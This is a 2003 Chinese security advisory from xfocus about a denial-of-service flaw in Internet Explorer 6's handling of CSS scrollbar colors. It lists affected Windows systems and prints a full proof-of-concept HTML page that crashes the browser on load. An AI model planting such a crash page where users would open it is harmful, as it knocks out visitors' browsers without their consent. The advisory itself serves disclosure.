xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Microsoft Internet Explorer滚动条底色拒绝服务攻击漏洞


发布时间:2003-10-22
更新时间:2003-10-22
严重程度:
威胁程度:本地拒绝服务
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:8874

受影响系统
Microsoft Internet Explorer 6.0 SP1                        
Microsoft Internet Explorer 6.0                            
   -Microsoft Windows 2000 Advanced Server                
   -Microsoft Windows 2000 Advanced Server SP1            
   -Microsoft Windows 2000 Advanced Server SP2            
   -Microsoft Windows 2000 Datacenter Server              
   -Microsoft Windows 2000 Datacenter Server SP1          
   -Microsoft Windows 2000 Datacenter Server SP2          
   -Microsoft Windows 2000 Professional                    
   -Microsoft Windows 2000 Professional SP1                
   -Microsoft Windows 2000 Professional SP2                
   -Microsoft Windows 2000 Server                          
   -Microsoft Windows 2000 Server SP1                      
   -Microsoft Windows 2000 Server SP2                      
   -Microsoft Windows 2000 Terminal Services              
   -Microsoft Windows 2000 Terminal Services SP1          
   -Microsoft Windows 2000 Terminal Services SP2          
   -Microsoft Windows 98                                  
   -Microsoft Windows 98SE                                
   -Microsoft Windows ME                                  
   -Microsoft Windows NT Enterprise Server 4.0 SP6a        
   -Microsoft Windows NT Server 4.0 SP6a                  
   -Microsoft Windows NT Workstation 4.0 SP6a              
   +Microsoft Windows Server 2003 Datacenter Edition      
   +Microsoft Windows Server 2003 Datacenter Edition 64-bit
   +Microsoft Windows Server 2003 Enterprise Edition      
   +Microsoft Windows Server 2003 Enterprise Edition 64-bit
   +Microsoft Windows Server 2003 Standard Edition        
   +Microsoft Windows Server 2003 Web Edition
详细描述
Microsoft Internet Explorer实现上在处理滚动条底色的时候存在漏洞,攻击者诱使用户访问一个包含恶意代码的网页,对程序进行拒绝服务攻击导致浏览器崩溃,Microsoft Internet Explorer 6.0受此漏洞影响,其他版本也有可能受影响。

测试代码
---snip---
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow-y: hidden;
scrollbar-base-color: '#330066';
}

.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}

</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}

function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
---snap---

解决方案
厂商还未提供解决方案。

相关信息
Andreas Boeckler <abo@netlands.de>

IE6 CSS-Crash
http://archives.neohapsis.com/archives/bugtraq/2003-10/0216.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved